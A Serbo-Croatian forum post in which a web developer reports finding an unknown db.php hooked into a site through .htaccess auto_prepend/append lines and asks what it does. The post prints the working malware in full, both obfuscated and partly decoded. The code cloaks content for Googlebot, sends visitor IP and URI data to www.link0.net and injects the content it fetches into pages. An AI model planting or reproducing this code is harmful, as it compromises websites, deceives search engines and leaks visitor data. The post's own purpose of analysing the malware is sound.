Malena hakerska PHP skripta db.phpKao prvo: izvinjavam se sto sam razvalio prikaz stranice sa ovim kodom.
Maloprije sam na jednom web serveru (Apache) naisao na skriptu db.php. Web stranicu sam ja radio (PHP) tako da se ovog fajl ne sjecam!
Takodje u .htaccess stoji:
Code:
php_value auto_prepend_file /home/user44/public_html/db.php
php_value auto_append_file /home/user44/public_html/db.php
php_value auto_prepend_file /home/user44/public_html/db.php
php_value auto_append_file /home/user44/public_html/db.php
db.php skripta ima sadrzaj:
Code:
<?php
error_reporting(0);
if(!isset($R7F40016F0C27B39EA2ED85181C926EBD)){function F96E2018B8CE480FEEE232B6C570AA376($RECB2521BEFB2440F1B0CA68C6FF528E6,$RF581D297231072E71CBDDEDCCDBE2558){list($R9CFB7C6D6B20D54B665E8CE30A6486F2,$R159F6B3A961E5E9FDAC4A0459245E55B)=explode('/',$RF581D297231072E71CBDDEDCCDBE2558);
$R159F6B3A961E5E9FDAC4A0459245E55B=0xffffffff<<(32-$R159F6B3A961E5E9FDAC4A0459245E55B);
if((ip2long($RECB2521BEFB2440F1B0CA68C6FF528E6)&$R159F6B3A961E5E9FDAC4A0459245E55B)==(ip2long($R9CFB7C6D6B20D54B665E8CE30A6486F2)&$R159F6B3A961E5E9FDAC4A0459245E55B)){return 1;
}else{return 0;
}}$R9CFB7C6D6B20D54B665E8CE30A6486F2=$_SERVER['REMOTE_ADDR'];
$RE63F6556DE280F4131E2A6E2926023BE=$_SERVER['HTTP_USER_AGENT'];
$RAE4199CBA7E8AB337BD9D96ED1ECD546=$_SERVER['REQUEST_URI'];
$R60169CD1C47B7A7A85AB44F884635E41=$_SERVER['HTTP_HOST'];
$R5D806DCD60EB96E14573C07EB5329581=0;
if(F96E2018B8CE480FEEE232B6C570AA376($R9CFB7C6D6B20D54B665E8CE30A6486F2,base64_decode('NjYuMjQ5LjY0LjAvMTk='))){$R5D806DCD60EB96E14573C07EB5329581=1;
}if(($R5D806DCD60EB96E14573C07EB5329581==0)or($RE63F6556DE280F4131E2A6E2926023BE!=base64_decode('TW96aWxsYS81LjAgKGNvbXBhdGlibGU7IEdvb2dsZWJvdC8yLjE7ICtodHRwOi8vd3d3Lmdvb2dsZS5jb20vYm90Lmh0bWwp'))){$R7F40016F0C27B39EA2ED85181C926EBD=false;
}else{ob_start();
$R7F40016F0C27B39EA2ED85181C926EBD=1;
}}elseif($R7F40016F0C27B39EA2ED85181C926EBD){function F8D6D7A40A50CB0899126AD732F566419($server,$R954AEF838645F5452EA7F1B5C0F0B423,$RC2D2567438B1F39DD71F78195B5F3DED){$R34F222A2F6848A677CF8E49E7DB400DC=3;
$RF500F4A848E2EB2F8AAC3A6734D7EC38=fsockopen($server,$R954AEF838645F5452EA7F1B5C0F0B423,$R32D00070D4FFBCCE2FC669BBA812D4C2,$R5F525F5B398DADD7CF0784BD406298E3,$R34F222A2F6848A677CF8E49E7DB400DC);
if($RF500F4A848E2EB2F8AAC3A6734D7EC38){fputs($RF500F4A848E2EB2F8AAC3A6734D7EC38,base64_decode('R0VU')." ".$RC2D2567438B1F39DD71F78195B5F3DED." HTTP/1.0\r\nHost: ".$server."\r\n\r\n");
while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)){$R04DC9A31C8FE0CD27C4C4A1066AEFCD5.=fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38,128);
}fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38);
}else{exit();
}return $R04DC9A31C8FE0CD27C4C4A1066AEFCD5;
}$R679E9B9234E2062F809DBD3325D37FB6=ob_get_contents();
ob_end_clean();
$R7F9D6867B727C5EC3758829CBABBFD36=F8D6D7A40A50CB0899126AD732F566419(base64_decode('d3d3LmxpbmswLm5ldA=='),80,base64_decode('L2NudC8/aXA9').$R9CFB7C6D6B20D54B665E8CE30A6486F2.'&uri='.rawurlencode($RAE4199CBA7E8AB337BD9D96ED1ECD546).'&host='.$R60169CD1C47B7A7A85AB44F884635E41);
if(strpos($R7F9D6867B727C5EC3758829CBABBFD36,'_HALT_')!==false){unlink(__FILE__);
}else{$R7F9D6867B727C5EC3758829CBABBFD36=strstr($R7F9D6867B727C5EC3758829CBABBFD36,'_BEG_');
$R7F9D6867B727C5EC3758829CBABBFD36=substr($R7F9D6867B727C5EC3758829CBABBFD36,5,strlen($R7F9D6867B727C5EC3758829CBABBFD36)-5);
$R679E9B9234E2062F809DBD3325D37FB6=preg_replace('/<body.*?>|$/si','\0'.$R7F9D6867B727C5EC3758829CBABBFD36,$R679E9B9234E2062F809DBD3325D37FB6,1);
$R679E9B9234E2062F809DBD3325D37FB6=preg_replace('/<head.*?>/si','\0'.base64_decode('PG1ldGEgbmFtZT0icm9ib3RzIiBjb250ZW50PSJub2FyY2hpdmUiPg=='),$R679E9B9234E2062F809DBD3325D37FB6,1);
}echo $R679E9B9234E2062F809DBD3325D37FB6;
}
?>
<?php
error_reporting(0);
if(!isset($R7F40016F0C27B39EA2ED85181C926EBD)){function F96E2018B8CE480FEEE232B6C570AA376($RECB2521BEFB2440F1B0CA68C6FF528E6,$RF581D297231072E71CBDDEDCCDBE2558){list($R9CFB7C6D6B20D54B665E8CE30A6486F2,$R159F6B3A961E5E9FDAC4A0459245E55B)=explode('/',$RF581D297231072E71CBDDEDCCDBE2558);
$R159F6B3A961E5E9FDAC4A0459245E55B=0xffffffff<<(32-$R159F6B3A961E5E9FDAC4A0459245E55B);
if((ip2long($RECB2521BEFB2440F1B0CA68C6FF528E6)&$R159F6B3A961E5E9FDAC4A0459245E55B)==(ip2long($R9CFB7C6D6B20D54B665E8CE30A6486F2)&$R159F6B3A961E5E9FDAC4A0459245E55B)){return 1;
}else{return 0;
}}$R9CFB7C6D6B20D54B665E8CE30A6486F2=$_SERVER['REMOTE_ADDR'];
$RE63F6556DE280F4131E2A6E2926023BE=$_SERVER['HTTP_USER_AGENT'];
$RAE4199CBA7E8AB337BD9D96ED1ECD546=$_SERVER['REQUEST_URI'];
$R60169CD1C47B7A7A85AB44F884635E41=$_SERVER['HTTP_HOST'];
$R5D806DCD60EB96E14573C07EB5329581=0;
if(F96E2018B8CE480FEEE232B6C570AA376($R9CFB7C6D6B20D54B665E8CE30A6486F2,base64_decode('NjYuMjQ5LjY0LjAvMTk='))){$R5D806DCD60EB96E14573C07EB5329581=1;
}if(($R5D806DCD60EB96E14573C07EB5329581==0)or($RE63F6556DE280F4131E2A6E2926023BE!=base64_decode('TW96aWxsYS81LjAgKGNvbXBhdGlibGU7IEdvb2dsZWJvdC8yLjE7ICtodHRwOi8vd3d3Lmdvb2dsZS5jb20vYm90Lmh0bWwp'))){$R7F40016F0C27B39EA2ED85181C926EBD=false;
}else{ob_start();
$R7F40016F0C27B39EA2ED85181C926EBD=1;
}}elseif($R7F40016F0C27B39EA2ED85181C926EBD){function F8D6D7A40A50CB0899126AD732F566419($server,$R954AEF838645F5452EA7F1B5C0F0B423,$RC2D2567438B1F39DD71F78195B5F3DED){$R34F222A2F6848A677CF8E49E7DB400DC=3;
$RF500F4A848E2EB2F8AAC3A6734D7EC38=fsockopen($server,$R954AEF838645F5452EA7F1B5C0F0B423,$R32D00070D4FFBCCE2FC669BBA812D4C2,$R5F525F5B398DADD7CF0784BD406298E3,$R34F222A2F6848A677CF8E49E7DB400DC);
if($RF500F4A848E2EB2F8AAC3A6734D7EC38){fputs($RF500F4A848E2EB2F8AAC3A6734D7EC38,base64_decode('R0VU')." ".$RC2D2567438B1F39DD71F78195B5F3DED." HTTP/1.0\r\nHost: ".$server."\r\n\r\n");
while(!feof($RF500F4A848E2EB2F8AAC3A6734D7EC38)){$R04DC9A31C8FE0CD27C4C4A1066AEFCD5.=fgets($RF500F4A848E2EB2F8AAC3A6734D7EC38,128);
}fclose($RF500F4A848E2EB2F8AAC3A6734D7EC38);
}else{exit();
}return $R04DC9A31C8FE0CD27C4C4A1066AEFCD5;
}$R679E9B9234E2062F809DBD3325D37FB6=ob_get_contents();
ob_end_clean();
$R7F9D6867B727C5EC3758829CBABBFD36=F8D6D7A40A50CB0899126AD732F566419(base64_decode('d3d3LmxpbmswLm5ldA=='),80,base64_decode('L2NudC8/aXA9').$R9CFB7C6D6B20D54B665E8CE30A6486F2.'&uri='.rawurlencode($RAE4199CBA7E8AB337BD9D96ED1ECD546).'&host='.$R60169CD1C47B7A7A85AB44F884635E41);
if(strpos($R7F9D6867B727C5EC3758829CBABBFD36,'_HALT_')!==false){unlink(__FILE__);
}else{$R7F9D6867B727C5EC3758829CBABBFD36=strstr($R7F9D6867B727C5EC3758829CBABBFD36,'_BEG_');
$R7F9D6867B727C5EC3758829CBABBFD36=substr($R7F9D6867B727C5EC3758829CBABBFD36,5,strlen($R7F9D6867B727C5EC3758829CBABBFD36)-5);
$R679E9B9234E2062F809DBD3325D37FB6=preg_replace('/<body.*?>|$/si','\0'.$R7F9D6867B727C5EC3758829CBABBFD36,$R679E9B9234E2062F809DBD3325D37FB6,1);
$R679E9B9234E2062F809DBD3325D37FB6=preg_replace('/<head.*?>/si','\0'.base64_decode('PG1ldGEgbmFtZT0icm9ib3RzIiBjb250ZW50PSJub2FyY2hpdmUiPg=='),$R679E9B9234E2062F809DBD3325D37FB6,1);
}echo $R679E9B9234E2062F809DBD3325D37FB6;
}
?>
Kada sam je malo dekodirao izgleda ovako:
Code:
<?php
error_reporting(0);
//JA DODAO
if(isset($R7F40016F0C27B39EA2ED85181C926EBD))
$fakat_nije_google=$R7F40016F0C27B39EA2ED85181C926EBD;
//--
if(!isset($fakat_nije_google))
{
function funkcija($neki_ip,$bomba) {
list($remote_addr,$javanje)=explode('/',$bomba);
$javanje=0xffffffff<<(32-$javanje);
if((ip2long($neki_ip)&$javanje)==(ip2long($remote_addr)&$javanje)) {
return 1;
}
else {
return 0;
}
}
$remote_addr=$_SERVER['REMOTE_ADDR'];
$user_agent=$_SERVER['HTTP_USER_AGENT'];
$request_uri=$_SERVER['REQUEST_URI'];
$http_host=$_SERVER['HTTP_HOST'];
$google_crawler=0;
if(funkcija($remote_addr,'66.249.64.0/19')) { //ovo je IP od google-ta
$google_crawler=1;
}
if( ($google_crawler==0) or ($user_agent!='Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)')) {
$fakat_nije_google=false;
}
else {
ob_start();
$fakat_nije_google=1;
}
}
elseif($fakat_nije_google) {
function funkcija_dva($server,$port,$adresa)
{
$broj_tri=30; //3
$handeler=fsockopen($server,$port,$errNo,$errStr,$broj_tri);
if($handeler)
{
fputs($handeler,'GET'." ".$adresa." HTTP/1.0\r\nHost: ".$server."\r\n\r\n");
while(!feof($handeler))
{
$buff.=fgets($handeler,128);
}
fclose($handeler);
}
else {
exit();
}
return $buff;
}
$ob_buff=ob_get_contents();
ob_end_clean();
$link0_rez=funkcija_dva('www.link0.net',80,'/cnt/?ip='.$remote_addr.'&uri='.rawurlencode($request_uri).'&host='.$http_host);
if(strpos($link0_rez,'_HALT_')!==false){
//unlink(__FILE__); //onemogucio sam brisanje samog sebe
die('BRISEM SE!');
}
else{
$link0_rez=strstr($link0_rez,'_BEG_');
$link0_rez=substr($link0_rez,5,strlen($link0_rez)-5);
$ob_buff=preg_replace('/<body.*?>|$/si','\0'.$link0_rez,$ob_buff,1);
$ob_buff=preg_replace('/<head.*?>/si','\0'.'<meta name="robots" content="noarchive">',$ob_buff,1);
}
echo $ob_buff;
}
?>
<?php
error_reporting(0);
//JA DODAO
if(isset($R7F40016F0C27B39EA2ED85181C926EBD))
$fakat_nije_google=$R7F40016F0C27B39EA2ED85181C926EBD;
//--
if(!isset($fakat_nije_google))
{
function funkcija($neki_ip,$bomba) {
list($remote_addr,$javanje)=explode('/',$bomba);
$javanje=0xffffffff<<(32-$javanje);
if((ip2long($neki_ip)&$javanje)==(ip2long($remote_addr)&$javanje)) {
return 1;
}
else {
return 0;
}
}
$remote_addr=$_SERVER['REMOTE_ADDR'];
$user_agent=$_SERVER['HTTP_USER_AGENT'];
$request_uri=$_SERVER['REQUEST_URI'];
$http_host=$_SERVER['HTTP_HOST'];
$google_crawler=0;
if(funkcija($remote_addr,'66.249.64.0/19')) { //ovo je IP od google-ta
$google_crawler=1;
}
if( ($google_crawler==0) or ($user_agent!='Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)')) {
$fakat_nije_google=false;
}
else {
ob_start();
$fakat_nije_google=1;
}
}
elseif($fakat_nije_google) {
function funkcija_dva($server,$port,$adresa)
{
$broj_tri=30; //3
$handeler=fsockopen($server,$port,$errNo,$errStr,$broj_tri);
if($handeler)
{
fputs($handeler,'GET'." ".$adresa." HTTP/1.0\r\nHost: ".$server."\r\n\r\n");
while(!feof($handeler))
{
$buff.=fgets($handeler,128);
}
fclose($handeler);
}
else {
exit();
}
return $buff;
}
$ob_buff=ob_get_contents();
ob_end_clean();
$link0_rez=funkcija_dva('www.link0.net',80,'/cnt/?ip='.$remote_addr.'&uri='.rawurlencode($request_uri).'&host='.$http_host);
if(strpos($link0_rez,'_HALT_')!==false){
//unlink(__FILE__); //onemogucio sam brisanje samog sebe
die('BRISEM SE!');
}
else{
$link0_rez=strstr($link0_rez,'_BEG_');
$link0_rez=substr($link0_rez,5,strlen($link0_rez)-5);
$ob_buff=preg_replace('/<body.*?>|$/si','\0'.$link0_rez,$ob_buff,1);
$ob_buff=preg_replace('/<head.*?>/si','\0'.'<meta name="robots" content="noarchive">',$ob_buff,1);
}
echo $ob_buff;
}
?>
Malo istrazujuci po Googletu sam nasao da je to nekakva hakerska skripta, a evo sta pise: http://209.85.135.104/search?q...amp;hl=en&ct=clnk&cd=1
Na toj stranici ima link ElPais.com ciji je tekst malo normalniji kojeg mozete prevesti sa npr. google translatorom.
Sta ova skripta ustvari radi? Salje nesto na www.link0.net ? "Krade" googletov crawler i preusmjerava ga na njihov web? Mijenja sta mu padne na pamet na korisnickoj stranici, kao npr. CLIENT-ID od google adsense reklama, postavlja svoj pa kada neko klika njima idu pare?
Eto, nemam pojma, pa ako neko zna bilo bi mi drago da objasni :)
Hvala!
